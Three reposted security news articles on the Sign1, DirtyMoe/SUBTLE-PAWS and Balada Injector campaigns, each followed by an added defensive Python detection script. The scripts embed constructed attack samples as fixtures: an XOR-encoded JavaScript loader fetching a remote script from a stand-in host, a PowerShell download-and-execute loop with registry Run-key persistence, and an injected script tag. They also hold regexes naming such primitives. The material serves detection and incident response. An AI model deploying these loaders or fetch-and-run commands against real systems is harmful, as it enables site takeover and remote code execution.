Massive Sign1 Campaign Infects 39,000+ WordPress Sites with Scam Redirects
INDIA NEWS (http://www.indiavpn.org), Fri, 22 Mar 2024 13:48:10 +0000
http://www.indiavpn.org/2024/03/22/massive-sign1-campaign-infects-39000-wordpress-sites-with-scam-redirects/

Mar 22, 2024 | Newsroom | Web Security / Vulnerability


A massive malware campaign dubbed Sign1 has compromised over 39,000 WordPress sites in the last six months, using malicious JavaScript injections to redirect users to scam sites.

The most recent variant of the malware is estimated to have infected no less than 2,500 sites over the past two months alone, Sucuri said in a report published this week.

The attacks inject rogue JavaScript into legitimate HTML widgets and into plugins whose purpose is to let site owners insert arbitrary JavaScript and other code; the attackers simply use that feature to add their own payload.


The XOR-encoded JavaScript code is subsequently decoded and used to execute a JavaScript file hosted on a remote server, which ultimately facilitates redirects to a VexTrio-operated traffic distribution system (TDS) but only if certain criteria are met.

What’s more, the malware uses time-based randomization to fetch dynamic URLs that change every 10 minutes to get around blocklists. These domains are registered a few days prior to their use in attacks.

“One of the most noteworthy things about this code is that it is specifically looking to see if the visitor has come from any major websites such as Google, Facebook, Yahoo, Instagram etc.,” security researcher Ben Martin said. “If the referrer does not match to these major sites, then the malware will not execute.”

Site visitors are then taken to other scam sites by executing another JavaScript from the same server.

The Sign1 campaign, first detected in the second half of 2023, has witnessed several iterations, with the attackers leveraging as many as 15 different domains since July 31, 2023.

It’s suspected that WordPress sites have been taken over by means of a brute-force attack, although adversaries could also leverage security flaws in plugins and themes to obtain access.


“Many of the injections are found inside WordPress custom HTML widgets that the attackers add to compromised websites,” Martin said. “Quite often, the attackers install a legitimate Simple Custom CSS and JS plugin and inject the malicious code using this plugin.”

Because nothing malicious is written to server files, the malware can stay undetected for extended periods of time, Sucuri said. The injected code lives instead in widget and plugin settings held in the WordPress database, so a file-integrity scan of the web root alone will not find it; a review of a suspect site has to cover the database-resident widget contents and plugin-stored snippets as well.
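A triage helper for the storage locations named above, added here as an example (it is not Sucuri's code). WordPress keeps Custom HTML widget bodies in the wp_options row widget_custom_html, and the Simple Custom CSS and JS plugin, to my understanding, stores each snippet as a post of its own type (custom-css-js); export those with WP-CLI (for example `wp option get widget_custom_html --format=json` and `wp post list --post_type=custom-css-js --format=ids`) and feed the bodies to the function below. The indicator patterns approximate the four traits the article describes (XOR/charCode decoding, a referrer gate on major sites, a dynamically created remote script, a 10-minute time bucket); the two snippets are constructed, the post id is invented, and loader.example is a made-up host. The single-byte XOR brute force recovers the hidden host from the char-code array without executing the script.

```python
"""Triage inline JavaScript pulled from WordPress widget and plugin storage for a
Sign1-style loader. Added example, not Sucuri's code. The indicator regexes are
heuristics approximating the behaviour the article describes, not published
signatures; the two snippets below are constructed and loader.example is made up."""
import re

XOR_DECODE = re.compile(r"fromCharCode[\s\S]{0,80}?\^|\^[\s\S]{0,80}?fromCharCode")
REMOTE_SCRIPT = re.compile(
    r"createElement\s*\(\s*['\"]script['\"]\s*\)[\s\S]{0,300}?\.src\s*=", re.I)
# 600000 ms = 10 minutes: the bucket the article says the URLs rotate on
TIME_BUCKET = re.compile(
    r"(?:Date\.now\s*\(\s*\)|getTime\s*\(\s*\))\s*/\s*(?:600000|6e5)", re.I)
REFERRER = re.compile(r"document\.referrer", re.I)
MAJOR_SITES = re.compile(r"google|facebook|yahoo|instagram", re.I)
NUM_ARRAY = re.compile(r"\[\s*(\d{1,3}(?:\s*,\s*\d{1,3}){7,})\s*\]")


def recover_xor_string(nums):
    """Brute-force a single-byte XOR key over a numeric char-code array and return
    (key, text) for the first key that yields printable ASCII starting with http."""
    if any(n > 255 for n in nums):
        return None
    for key in range(256):
        decoded = bytes(n ^ key for n in nums)
        try:
            text = decoded.decode("ascii")
        except UnicodeDecodeError:
            continue
        if text.isprintable() and text.lower().startswith("http"):
            return key, text
    return None


def triage_snippet(source, content):
    """Score one stored HTML/JS body; two or more indicators marks it suspicious."""
    hits = []
    if XOR_DECODE.search(content):
        hits.append("xor_decode")
    # A benign tag that merely mentions Google is not a gate: both halves are required.
    if REFERRER.search(content) and MAJOR_SITES.search(content):
        hits.append("referrer_gate")
    if REMOTE_SCRIPT.search(content):
        hits.append("remote_script")
    if TIME_BUCKET.search(content):
        hits.append("time_bucket")
    recovered = None
    for m in NUM_ARRAY.finditer(content):
        recovered = recover_xor_string([int(x) for x in m.group(1).split(",")])
        if recovered:
            break
    return {"source": source, "indicators": hits, "recovered": recovered,
            "suspicious": len(hits) >= 2}


def triage_all(samples):
    return [triage_snippet(src, body) for src, body in samples]


# Constructed sample bodies, as they would come out of wp_options / plugin posts.
XOR_KEY = 7
LOADER_URL = "https://loader.example/"          # made-up host
ENCODED = [ord(c) ^ XOR_KEY for c in LOADER_URL]

SAMPLES = [
    # Benign analytics tag of the kind legitimately placed in a Custom HTML widget.
    ("wp_options:widget_custom_html[2]",
     '<script async src="https://www.googletagmanager.com/gtag/js?id=G-XXXXXXX"></script>\n'
     "<script>window.dataLayer=window.dataLayer||[];function gtag(){dataLayer.push(arguments);}"
     "gtag('js',new Date());gtag('config','G-XXXXXXX');</script>"),
    # Loader mimicking the described traits: XOR-decoded host, referrer gate,
    # remote script whose URL changes every 10 minutes. Post id is invented.
    ("custom-css-js post (constructed id 418)",
     "<script>var k=%d,d=[%s],s='';for(var i=0;i<d.length;i++){s+=String.fromCharCode(d[i]^k);}"
     "if(/google|facebook|yahoo|instagram/i.test(document.referrer)){var e=document.createElement('script');"
     "e.src=s+Math.floor(Date.now()/600000)+'.js';document.head.appendChild(e);}</script>"
     % (XOR_KEY, ",".join(map(str, ENCODED)))),
]

if __name__ == "__main__":
    for r in triage_all(SAMPLES):
        print(r["source"], r["indicators"], r["recovered"],
              "SUSPICIOUS" if r["suspicious"] else "ok")
```

Run it as a script to see the verdicts; on a real site, pass the exported bodies to triage_all() instead of SAMPLES. The recovered host is what to pivot on next (passive DNS, registration date, which the article notes is only days before use), and the requirement for two independent indicators keeps ordinary tag-manager or analytics snippets out of the report.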

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.



DirtyMoe Malware Infects 2,000+ Ukrainian Computers for DDoS and Cryptojacking
INDIA NEWS (http://www.indiavpn.org), Fri, 02 Feb 2024 13:29:58 +0000
http://www.indiavpn.org/2024/02/02/dirtymoe-malware-infects-2000-ukrainian-computers-for-ddos-and-cryptojacking/

Feb 02, 2024 | Newsroom | Cryptojacking / Malware


The Computer Emergency Response Team of Ukraine (CERT-UA) has warned that more than 2,000 computers in the country have been infected by a strain of malware called DirtyMoe.

The agency attributed the campaign to a threat actor it calls UAC-0027.

DirtyMoe, active since at least 2016, is capable of carrying out cryptojacking and distributed denial-of-service (DDoS) attacks. In March 2022, cybersecurity firm Avast revealed the malware’s ability to propagate in a worm-like fashion by taking advantage of known security flaws.

The DDoS botnet is known to be delivered by means of another malware referred to as Purple Fox or via bogus MSI installer packages for popular software such as Telegram. Purple Fox is also equipped with a rootkit that allows the threat actors to hide the malware on the machine and make it difficult to detect and remove.


The exact initial access vector used in the campaign targeting Ukraine is currently unknown. CERT-UA is recommending that organizations keep their systems up-to-date, enforce network segmentation, and monitor network traffic for any anomalous activity.

The disclosure comes as Securonix detailed an ongoing phishing campaign known as STEADY#URSA targeting Ukrainian military personnel with the goal of delivering a bespoke PowerShell backdoor dubbed SUBTLE-PAWS.

“The exploitation chain is relatively simple: it involves the target executing a malicious shortcut (.lnk) file which loads and executes a new PowerShell backdoor payload code (found inside another file contained within the same archive),” security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said.

The attack is said to be related to a threat actor known as Shuckworm, which is also known as Aqua Blizzard (formerly Actinium), Armageddon, Gamaredon, Iron Tilden, Primitive Bear, Trident Ursa, UNC530, and Winterflounder. Active since at least 2013, it’s assessed to be part of Russia’s Federal Security Service (FSB).

SUBTLE-PAWS, in addition to setting up persistence on the host, uses Telegram’s blogging platform called Telegraph to retrieve the command-and-control (C2) information, a technique previously identified as associated with the adversary since early 2023, and can propagate through removable attached drives.


Gamaredon’s ability to spread via USB drives was also documented by Check Point in November 2023, which named the PowerShell-based USB worm LitterDrifter.

“The SUBTLE-PAWS backdoor uses advanced techniques to execute malicious payloads dynamically,” the researchers said.

“They store and retrieve executable PowerShell code from the Windows Registry which can assist in evading traditional file-based detection methods. This approach also aids in maintaining persistence on the infected system, as the malware can initiate itself again after reboots or other interruptions.”
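The registry-resident PowerShell trait described above is something a responder can hunt for offline in an exported hive. The scanner below is an added example, not Securonix's or CERT-UA's code. It parses REGEDIT5 .reg text (string, dword and hex(N) values, the latter decoded as UTF-16LE), flags values that look like PowerShell either directly or after one base64/UTF-16 layer (the shape -EncodedCommand and [Convert]::FromBase64String work with), and marks Run-key values that read code back out of the registry as the persistence half of the pattern. The sample export, its key and value names, and the telegra.ph page path are constructed; Telegraph pages are served from the telegra.ph domain, which is why that string is one of the indicators.

```python
"""Scan a Windows .reg export for PowerShell stashed in registry values, the
SUBTLE-PAWS trait described above. Added example, not Securonix's or CERT-UA's
code; the export below is constructed (keys, value names and the telegra.ph
page path are made up)."""
import base64
import re

VALUE_RE = re.compile(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$')
HEX_RE = re.compile(r'^hex(?:\((\d+)\))?:(.*)$', re.I)
B64_RE = re.compile(r'^[A-Za-z0-9+/]{40,}={0,2}$')
# Heuristic indicators written for this example, not vendor signatures.
INDICATORS = {
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "base64_decode": re.compile(r"FromBase64String|-EncodedCommand|-enc\b", re.I),
    "registry_read": re.compile(r"Get-ItemProperty(?:Value)?|\bHK(?:CU|LM):", re.I),
    "download": re.compile(r"DownloadString|Invoke-WebRequest|Net\.WebClient", re.I),
    "telegraph_c2": re.compile(r"telegra\.ph", re.I),  # Telegraph is served from telegra.ph
}


def unescape(s):
    return re.sub(r'\\(["\\])', r'\1', s)  # .reg escapes backslash and quote with a backslash


def bytes_to_text(data):
    # ASCII stored as UTF-16LE has a zero byte in every odd position.
    if data and len(data) % 2 == 0 and all(b == 0 for b in data[1::2]):
        return data.decode("utf-16-le").rstrip("\x00")
    return data.decode("utf-8", errors="replace").rstrip("\x00")


def decode_data(raw):
    raw = raw.strip()
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return unescape(raw[1:-1])
    if raw.lower().startswith("dword:"):
        return str(int(raw[6:], 16))
    m = HEX_RE.match(raw)  # hex: REG_BINARY; hex(1)/(2)/(7): SZ, EXPAND_SZ, MULTI_SZ
    if m:
        return bytes_to_text(bytes.fromhex(m.group(2).replace(",", "").replace(" ", "")))
    return raw


def parse_reg(text):
    """Return (key, value_name, data_as_text) for every value in a REGEDIT5 export."""
    entries, key, lines, i = [], None, text.splitlines(), 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        while line.endswith("\\") and i < len(lines):  # hex data continued on next line
            line = line[:-1] + lines[i].strip()
            i += 1
        if not line or line.startswith((";", "Windows Registry Editor")):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            name = "(Default)" if m.group(1) == "@" else unescape(m.group(2))
            entries.append((key, name, decode_data(m.group(3))))
    return entries


def check(text):
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_reg(text):
    """Flag values that look like PowerShell directly or after one base64/UTF-16
    layer, and mark Run-key entries that pull code back out of the registry."""
    findings = []
    for key, name, data in parse_reg(text):
        hits, decoded = check(data), None
        if B64_RE.match(data) and len(data) % 4 == 0:
            try:
                decoded = bytes_to_text(base64.b64decode(data, validate=True))
            except ValueError:
                decoded = None
            inner = check(decoded) if decoded else []
            if inner:
                hits = sorted(set(hits) | set(inner) | {"base64_layer"})
        if not hits:
            continue
        persistence = key.lower().endswith("\\currentversion\\run") and "registry_read" in hits
        findings.append({"key": key, "name": name, "indicators": hits,
                         "decoded": decoded, "persistence": persistence})
    return findings


def reg_hex(kind, data, per_line=16):
    """Render bytes as regedit exports hex(N) values: comma-separated, wrapped with
    a trailing backslash on continued lines."""
    chunks = [",".join(f"{b:02x}" for b in data[i:i + per_line])
              for i in range(0, len(data), per_line)]
    return f"hex({kind}):" + ",\\\n  ".join(chunks)


# Constructed stages: STAGE1 pulls STAGE2 out of the registry; STAGE2 polls a
# made-up Telegraph page for commands, mirroring the C2-over-Telegraph trait.
STAGE1 = "IEX (Get-ItemProperty 'HKCU:\\Software\\Classes\\ExampleData').Stage2"
STAGE2 = ("while($true){$c=(New-Object Net.WebClient).DownloadString("
          "'https://telegra.ph/example-page-01-01');IEX $c;Start-Sleep 300}")
B64_STAGE1 = base64.b64encode(STAGE1.encode("utf-16-le")).decode()
HEX_STAGE2 = reg_hex(2, (STAGE2 + "\x00").encode("utf-16-le"))

SAMPLE_REG = f'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced]
"Hidden"=dword:00000002

[HKEY_CURRENT_USER\\Software\\ExampleVendor\\App]
"InstallPath"="C:\\\\Program Files\\\\ExampleVendor\\\\app.exe"

[HKEY_CURRENT_USER\\Software\\Classes\\ExampleData]
"s1"="{B64_STAGE1}"
"Stage2"={HEX_STAGE2}

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]
"Updater"="powershell.exe -w hidden -c \\"IEX([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String((Get-ItemProperty 'HKCU:\\\\Software\\\\Classes\\\\ExampleData').s1)))\\""
'''

if __name__ == "__main__":
    for f in scan_reg(SAMPLE_REG):
        print(f["key"], f["name"], f["indicators"], "PERSISTENCE" if f["persistence"] else "")
```

`reg export HKCU hkcu.reg` writes UTF-16LE, so open the file with encoding="utf-16" before passing its contents to scan_reg(). Value-level hits alone are noisy on developer machines; what separates this pattern from ordinary scripts is the chain the output exposes: a Run-key value whose only job is to read and evaluate another value, and a stage that resolves its C2 through Telegraph.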




Balada Injector Infects Over 7,100 WordPress Sites Using Plugin Vulnerability
INDIA NEWS (http://www.indiavpn.org), Mon, 15 Jan 2024 10:38:13 +0000
http://www.indiavpn.org/2024/01/15/balada-injector-infects-over-7100-wordpress-sites-using-plugin-vulnerability/

Jan 15, 2024 | Newsroom | Website Security / Vulnerability


Thousands of WordPress sites using a vulnerable version of the Popup Builder plugin have been compromised with a malware called Balada Injector.

First documented by Doctor Web in January 2023, the campaign runs in periodic attack waves that weaponize security flaws in WordPress plugins to inject a backdoor designed to redirect visitors of infected sites to bogus tech support pages, fraudulent lottery wins, and push notification scams.

Subsequent findings unearthed by Sucuri have revealed the massive scale of the operation, which is said to have been active since 2017 and infiltrated no less than 1 million sites since then.


The GoDaddy-owned website security company, which detected the latest Balada Injector activity on December 13, 2023, said it identified the injections on over 7,100 sites.

These attacks take advantage of a high-severity flaw in Popup Builder (CVE-2023-6000, CVSS score: 8.8) – a plugin with more than 200,000 active installs – that was publicly disclosed by WPScan a day before. The issue was addressed in version 4.2.3.

“When successfully exploited, this vulnerability may let attackers perform any action the logged‑in administrator they targeted is allowed to do on the targeted site, including installing arbitrary plugins, and creating new rogue Administrator users,” WPScan researcher Marc Montpas said.

The ultimate goal of the campaign is to insert a malicious JavaScript file hosted on specialcraftbox[.]com and use it to take control of the website and load additional JavaScript in order to facilitate malicious redirects.

Furthermore, the threat actors behind Balada Injector are known to establish persistent control over compromised sites by uploading backdoors, adding malicious plugins, and creating rogue blog administrators.

This is often accomplished by using the JavaScript injections to specifically target logged-in site administrators.

“The idea is when a blog administrator logs into a website, their browser contains cookies that allow them to do all their administrative tasks without having to authenticate themselves on every new page,” Sucuri researcher Denis Sinegubko noted last year.


“So, if their browser loads a script that tries to emulate administrator activity, it will be able to do almost anything that can be done via the WordPress admin interface.”

The new wave is no exception in that if logged-in admin cookies are detected, it weaponizes the elevated privileges to install and activate a rogue backdoor plugin (“wp-felody.php” or “Wp Felody”) so as to fetch a second-stage payload from the aforementioned domain.

The payload, another backdoor, is saved under the name “sasas” to the directory where temporary files are stored, and is then executed and deleted from disk.

“It checks up to three levels above the current directory, looking for the root directory of the current site and any other sites that may share the same server account,” Sinegubko said.

“Then, in the detected site root directories, it modifies the wp-blog-header.php file to inject the same Balada JavaScript malware as was originally injected via the Popup Builder vulnerability.”
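An audit for the two file-system traits described above (a modified wp-blog-header.php in every site root the compromised account can reach, and a rogue plugin file), added here as an example and not Sucuri's code. It finds every WordPress root under a hosting account, diffs each site's wp-blog-header.php against a pristine copy, and lists PHP files sitting directly in wp-content/plugins that stock WordPress does not ship (hello.php and the placeholder index.php do). The account tree is constructed with tempfile, REFERENCE_HEADER is an abridged stand-in for the real file (take it from a clean WordPress download of the site's exact version), cdn.example stands in for the injected host, and placing wp-felody.php as a loose file is an assumption about how the rogue plugin was laid out.

```python
"""Audit every WordPress install under a hosting account for the two Balada traits
described above: a modified wp-blog-header.php and a loose PHP file dropped into
wp-content/plugins. Added example, not Sucuri's code; the account tree is built
with tempfile, and cdn.example is a made-up host."""
import difflib
import os
import re
import tempfile

WP_ROOT_MARKERS = ("wp-settings.php", "wp-load.php", "wp-blog-header.php")
SKIP_DIRS = {"wp-admin", "wp-includes", "wp-content", "node_modules", ".git"}
# Stock WordPress ships hello.php (Hello Dolly) and a placeholder index.php there.
STOCK_PLUGIN_FILES = {"hello.php", "index.php"}
SUSPICIOUS_PHP = re.compile(r"<script|base64_decode|\beval\s*\(|gzinflate|str_rot13", re.I)

# Abridged stand-in for the pristine file; in practice read it from a clean
# WordPress download of the same version as the site being audited.
REFERENCE_HEADER = """<?php
/**
 * Loads the WordPress environment and template.
 */
if ( ! isset( $wp_did_header ) ) {
	$wp_did_header = true;
	require_once __DIR__ . '/wp-load.php';
	wp();
	require_once ABSPATH . WPINC . '/template-loader.php';
}
"""


def find_site_roots(account_root):
    """Every directory holding all WP_ROOT_MARKERS is a WordPress root. Core and
    content trees are pruned so nested installs are found without walking uploads.
    The backdoor reaches the same set by climbing up to three directory levels."""
    roots = []
    for dirpath, dirnames, filenames in os.walk(account_root):
        if all(marker in filenames for marker in WP_ROOT_MARKERS):
            roots.append(dirpath)
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
    return sorted(roots)


def header_diff(site_root, reference_text):
    """Return (modified, added_lines) for the site's wp-blog-header.php."""
    path = os.path.join(site_root, "wp-blog-header.php")
    with open(path, encoding="utf-8", errors="replace") as fh:
        current = fh.read().splitlines()
    reference = reference_text.splitlines()
    added = [l[1:] for l in difflib.unified_diff(reference, current, n=0)
             if l.startswith("+") and not l.startswith("+++")]
    return current != reference, added


def loose_plugin_files(site_root):
    """PHP files directly inside wp-content/plugins that WordPress does not ship."""
    plugins = os.path.join(site_root, "wp-content", "plugins")
    if not os.path.isdir(plugins):
        return []
    return sorted(f for f in os.listdir(plugins)
                  if f.endswith(".php") and f not in STOCK_PLUGIN_FILES
                  and os.path.isfile(os.path.join(plugins, f)))


def audit_account(account_root, reference_text=REFERENCE_HEADER):
    """Report per site (keyed by path relative to the account root)."""
    report = {}
    for site in find_site_roots(account_root):
        modified, added = header_diff(site, reference_text)
        rel = os.path.relpath(site, account_root).replace(os.sep, "/")
        report[rel] = {
            "header_modified": modified,
            "added_lines": added,
            "suspicious_added": [l for l in added if SUSPICIOUS_PHP.search(l)],
            "rogue_plugin_files": loose_plugin_files(site),
        }
    return report


def build_sample_account():
    """Constructed account: a clean site in public_html and a tampered one in sub/blog.
    The rogue plugin is laid out as a loose file, an assumption for this example."""
    root = tempfile.mkdtemp(prefix="balada-demo-")
    injected = ("<?php echo '<script src=\"https://cdn.example/stat.js\"></script>'; ?>\n"
                + REFERENCE_HEADER)  # cdn.example stands in for the injected host
    for rel, header, extra in (("public_html", REFERENCE_HEADER, None),
                               ("sub/blog", injected, "wp-felody.php")):
        site = os.path.join(root, *rel.split("/"))
        plugins = os.path.join(site, "wp-content", "plugins")
        os.makedirs(plugins)
        for marker in WP_ROOT_MARKERS:
            with open(os.path.join(site, marker), "w") as fh:
                fh.write(header if marker == "wp-blog-header.php" else "<?php // stub\n")
        for name in STOCK_PLUGIN_FILES | ({extra} if extra else set()):
            with open(os.path.join(plugins, name), "w") as fh:
                fh.write("<?php // stub\n")
    return root


if __name__ == "__main__":
    for site, result in audit_account(build_sample_account()).items():
        print(site, result)
```

Run against a real account with audit_account("/home/<account>", open("wp-blog-header.php.pristine").read()), replacing the stand-in reference with the file from a clean release. Because the backdoor reinfects every site it can reach from one compromised install, a single clean diff is not enough; every root the walk returns has to come back unmodified before the account can be considered clean.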



